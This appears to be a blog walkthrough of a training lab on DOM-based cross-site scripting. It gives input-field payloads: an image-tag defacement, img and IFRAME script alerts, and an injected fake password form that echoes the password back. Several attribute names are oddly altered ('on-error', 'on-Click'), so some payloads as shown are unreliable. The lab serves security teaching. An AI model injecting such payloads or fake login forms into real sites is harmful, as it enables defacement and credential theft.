Ajax Security: LAB: DOM-Based cross-site scripting and Solution


Using  XSS vulnerability to inject malicious code into the DOM. 


By code injection to input field. 

Step by step Guide

Stage 1  Deface this website 

Deface this website using the image at the following location: OWASP IMAGE(

Use  <IMG SRC=""/>

Stage 2 Create a JavaScript alert using the image tag

Use below script 

<img src=x on-error=;;alert('XSS_Vulnerable') />

Stage 3 create a JavaScript alert using the IFRAME tag

Use below script

<IFRAME SRC="javascript:alert('XSS_Vulnerable');"></IFRAME>

Stage 4 Create a fake login form

1. To create fake login form by entering below script  to Field for Name entry. 

"Your assword:<BR><input type = "password" name="pass"/><button on-Click="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR>"

2. Once enter it will show fake password entry form 

3. This concludes this lab. 

Please publish modules in offcanvas position.